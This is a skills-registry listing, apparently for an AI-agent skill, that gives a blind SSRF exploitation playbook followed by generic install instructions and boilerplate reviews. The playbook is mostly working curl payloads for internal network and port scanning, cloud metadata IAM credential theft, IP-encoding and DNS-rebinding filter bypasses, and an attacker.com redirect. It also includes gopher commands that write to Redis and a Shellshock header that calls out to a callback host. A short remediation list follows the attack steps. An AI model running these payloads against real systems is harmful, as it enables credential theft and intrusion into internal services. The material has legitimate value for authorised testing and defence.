performing-blind-ssrf-exploitation▌
mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints.
| name | performing-blind-ssrf-exploitation |
| description | Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | - blind-ssrf - ssrf - out-of-band - burp-collaborator - cloud-metadata - internal-network - oob-detection |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 |
Performing Blind SSRF Exploitation
When to Use
- When testing URL/webhook input parameters where server-side responses are not reflected
- During assessment of applications that fetch external resources (avatars, previews, imports)
- When testing PDF generators, image processors, or document converters for SSRF
- During cloud security assessments to detect metadata endpoint access
- When evaluating webhook functionality and URL validation implementations
Prerequisites
- Burp Suite Professional with Burp Collaborator for OOB detection
- interact.sh or webhook.site for external callback monitoring
- Understanding of SSRF attack vectors and internal network enumeration
- Knowledge of cloud metadata endpoints (AWS, GCP, Azure)
- VPS or controlled server for advanced exploitation callback handling
- Python with requests library for automation scripts
Workflow
Step 1 — Identify Blind SSRF Input Points
# Common SSRF-susceptible parameters:
# url=, uri=, path=, dest=, redirect=, src=, source=
# link=, imageURL=, callback=, webhook=, feed=, import=
# Test URL fetch functionality
curl -X POST http://target.com/api/fetch-url \
-H "Content-Type: application/json" \
-d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}'
# Test webhook configuration
curl -X POST http://target.com/api/webhooks \
-H "Authorization: Bearer TOKEN" \
-H "Content-Type: application/json" \
-d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}'
# Test image/avatar URL
curl -X POST http://target.com/api/profile/avatar \
-H "Authorization: Bearer TOKEN" \
-H "Content-Type: application/json" \
-d '{"avatar_url": "http://COLLABORATOR.oastify.com/avatar.png"}'
# Test document import
curl -X POST http://target.com/api/import \
-H "Content-Type: application/json" \
-d '{"import_url": "http://COLLABORATOR.oastify.com/data.csv"}'
Step 2 — Confirm Blind SSRF with Out-of-Band Detection
# Use Burp Collaborator for DNS + HTTP callbacks
# Generate collaborator payload: xxxxxx.oastify.com
# DNS-based detection (works even with HTTP blocked)
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://dns-only-test.COLLABORATOR.oastify.com"}'
# Check Collaborator for DNS lookups
# HTTP-based detection
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://http-test.COLLABORATOR.oastify.com"}'
# Check for HTTP requests in Collaborator
# interact.sh alternative
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://RANDOM.interact.sh"}'
# Monitor interact.sh dashboard for interactions
Step 3 — Enumerate Internal Network
# Scan internal IP ranges via blind SSRF
# Use timing differences to determine if hosts are alive
# Scan common internal ranges
for ip in 10.0.0.{1..10} 172.16.0.{1..10} 192.168.1.{1..10}; do
start=$(date +%s%N)
curl -X POST http://target.com/api/fetch -d "{\"url\": \"http://$ip/\"}" -s -o /dev/null --max-time 5
end=$(date +%s%N)
elapsed=$(( (end - start) / 1000000 ))
echo "$ip: ${elapsed}ms"
done
# Port scanning via blind SSRF
for port in 80 443 8080 8443 3000 5000 6379 27017 5432 3306 9200; do
curl -X POST http://target.com/api/fetch \
-d "{\"url\": \"http://127.0.0.1:$port/\"}" -s -o /dev/null -w "%{time_total}\n"
echo "Port $port tested"
done
# Use gopher:// for more advanced internal service interaction
curl -X POST http://target.com/api/fetch \
-d '{"url": "gopher://127.0.0.1:6379/_INFO"}'
Step 4 — Access Cloud Metadata Endpoints
# AWS metadata (IMDSv1)
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/latest/meta-data/"}'
# AWS IAM credentials
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'
# GCP metadata
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://metadata.google.internal/computeMetadata/v1/"}'
# Azure metadata
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}'
# DNS rebinding for metadata access (bypass IP blocking)
# Use services like rebinder.net to create DNS rebinding domains
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://A.169.254.169.254.1time.YOUR-REBIND-DOMAIN.com/"}'
Step 5 — Bypass SSRF Filters
# IP representation bypass
curl -X POST http://target.com/api/fetch -d '{"url": "http://0x7f000001/"}' # Hex
curl -X POST http://target.com/api/fetch -d '{"url": "http://2130706433/"}' # Decimal
curl -X POST http://target.com/api/fetch -d '{"url": "http://0177.0.0.1/"}' # Octal
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.1/"}' # Short
curl -X POST http://target.com/api/fetch -d '{"url": "http://[::1]/"}' # IPv6
# URL parsing confusion
curl -X POST http://target.com/api/fetch -d '{"url": "http://[email protected]/"}'
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.0.0.1#@target.com/"}'
# Redirect-based bypass
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://attacker.com/redirect?url=http://169.254.169.254/"}'
# DNS rebinding
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://make-169-254-169-254-rr.1u.ms/"}'
Step 6 — Escalate Blind SSRF to Data Exfiltration
# Exfiltrate data via DNS (when only DNS callback works)
# If you achieve SSRF to a service that reflects data:
# Chain: SSRF -> internal service -> DNS exfiltration
# Use gopher protocol for Redis command execution
curl -X POST http://target.com/api/fetch \
-d '{"url": "gopher://127.0.0.1:6379/_SET%20ssrf_test%20exploited%0AQUIT"}'
# Chain blind SSRF with Shellshock on internal hosts
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://internal-cgi-server/cgi-bin/test.sh"}'
# With User-Agent: () { :; }; /bin/bash -c "ping -c1 COLLABORATOR.oastify.com"
# Exploit internal services via SSRF
# Redis: write SSH key
# Memcached: inject serialized objects
# Elasticsearch: read indices
# Internal API: access authenticated endpoints
Key Concepts
| Concept | Description |
|---|---|
| Blind SSRF | Server makes request but response is not visible to attacker |
| Out-of-Band Detection | Using external callbacks (DNS, HTTP) to confirm SSRF execution |
| DNS Rebinding | Technique to bypass IP-based SSRF filters by changing DNS resolution |
| Cloud Metadata | Instance metadata endpoints accessible via SSRF for credential theft |
| Gopher Protocol | Protocol allowing crafted payloads to interact with internal TCP services |
| Time-Based Detection | Detecting SSRF success by measuring response time differences |
| SSRF Chain | Combining SSRF with other vulnerabilities for greater impact |
Tools & Systems
| Tool | Purpose |
|---|---|
| Burp Collaborator | Out-of-band interaction server for DNS and HTTP callback detection |
| interact.sh | Open-source OOB interaction tool by ProjectDiscovery |
| SSRFmap | Automated SSRF detection and exploitation framework |
| Gopherus | Generate gopher payloads for exploiting internal services via SSRF |
| webhook.site | Free webhook receiver for testing SSRF callbacks |
| rebinder.net | DNS rebinding service for bypassing SSRF IP filters |
Common Scenarios
- Cloud Credential Theft — Exploit blind SSRF to access AWS/GCP/Azure metadata endpoints and steal IAM credentials for cloud account compromise
- Internal Service Discovery — Use timing-based blind SSRF to enumerate internal network hosts and open ports
- Redis Exploitation — Chain blind SSRF with gopher:// protocol to execute commands on internal Redis instances
- Webhook Abuse — Exploit webhook URL fields to scan internal networks and exfiltrate data through OOB channels
- PDF Generator SSRF — Inject internal URLs into PDF generation features to exfiltrate internal content in rendered documents
Output Format
## Blind SSRF Assessment Report
- **Target**: http://target.com/api/fetch-url
- **Detection Method**: Burp Collaborator DNS + HTTP callback
- **Internal Access Confirmed**: Yes
### Findings
| # | Input Point | Payload | Detection | Impact |
|---|------------|---------|-----------|--------|
| 1 | POST /api/fetch url parameter | http://collaborator | HTTP callback | Confirmed SSRF |
| 2 | POST /api/avatar avatar_url | http://169.254.169.254 | Timing (2.3s vs 0.1s) | Cloud metadata |
| 3 | POST /api/webhook callback | gopher://127.0.0.1:6379 | Redis write confirmed | RCE potential |
### Internal Network Map
| Host | Port | Service | Accessible |
|------|------|---------|-----------|
| 10.0.0.5 | 6379 | Redis | Yes |
| 10.0.0.10 | 9200 | Elasticsearch | Yes |
| 169.254.169.254 | 80 | AWS Metadata | Yes |
### Remediation
- Implement allowlist of permitted external domains for URL fetching
- Block requests to private IP ranges and cloud metadata endpoints
- Use IMDSv2 (token-required) for AWS instance metadata
- Disable unused URL schemes (gopher, file, dict)
- Implement network-level segmentation for application servers
How to use performing-blind-ssrf-exploitation on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add performing-blind-ssrf-exploitation
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches performing-blind-ssrf-exploitation from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate performing-blind-ssrf-exploitation. Access the skill through slash commands (e.g., /performing-blind-ssrf-exploitation) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Task Automation & Efficiency
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Knowledge Enhancement
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Quality Improvement
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client with skill support
- ›Clear understanding of task or problem to solve
- ›Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Installation Steps
- 1.Install skill using provided installation command
- 2.Test with simple use case relevant to your work
- 3.Evaluate output quality and relevance
- 4.Iterate on prompts to improve results
- 5.Integrate into regular workflow if valuable
Common Pitfalls
- ⚠Expecting perfect results without iteration
- ⚠Not providing enough context in prompts
- ⚠Using skill for tasks outside its intended scope
- ⚠Accepting outputs without review and validation
Best Practices▌
✓ Do
- +Start with clear, specific prompts
- +Provide relevant context and constraints
- +Review and refine all outputs before using
- +Iterate to improve output quality
- +Document successful prompt patterns
✗ Don't
- −Don't use without understanding skill limitations
- −Don't skip validation of outputs
- −Don't share sensitive information in prompts
- −Don't expect skill to replace human judgment
💡 Pro Tips
- ★Be specific about desired format and style
- ★Ask for multiple options to choose from
- ★Request explanations to understand reasoning
- ★Combine AI efficiency with human expertise
When to Use This▌
✓ Use When
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid When
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path▌
- 1Familiarize yourself with skill capabilities and limitations
- 2Start with low-risk, non-critical tasks
- 3Progress to more complex and valuable use cases
- 4Build expertise through regular use and experimentation
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.6★★★★★72 reviews- ★★★★★Anaya Jackson· Dec 28, 2024
performing-blind-ssrf-exploitation fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
- ★★★★★Anika Rao· Dec 28, 2024
performing-blind-ssrf-exploitation is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
- ★★★★★Nikhil Thomas· Dec 16, 2024
Registry listing for performing-blind-ssrf-exploitation matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Anika Sharma· Dec 4, 2024
Useful defaults in performing-blind-ssrf-exploitation — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
- ★★★★★Anika Martin· Nov 23, 2024
I recommend performing-blind-ssrf-exploitation for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★Anika Patel· Nov 23, 2024
Solid pick for teams standardizing on skills: performing-blind-ssrf-exploitation is focused, and the summary matches what you get after install.
- ★★★★★Nikhil Taylor· Nov 19, 2024
Registry listing for performing-blind-ssrf-exploitation matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Chen Harris· Nov 19, 2024
Keeps context tight: performing-blind-ssrf-exploitation is the kind of skill you can hand to a new teammate without a long onboarding doc.
- ★★★★★Chen Martin· Nov 15, 2024
We added performing-blind-ssrf-exploitation from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
- ★★★★★Anaya Harris· Nov 7, 2024
performing-blind-ssrf-exploitation fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
showing 1-10 of 72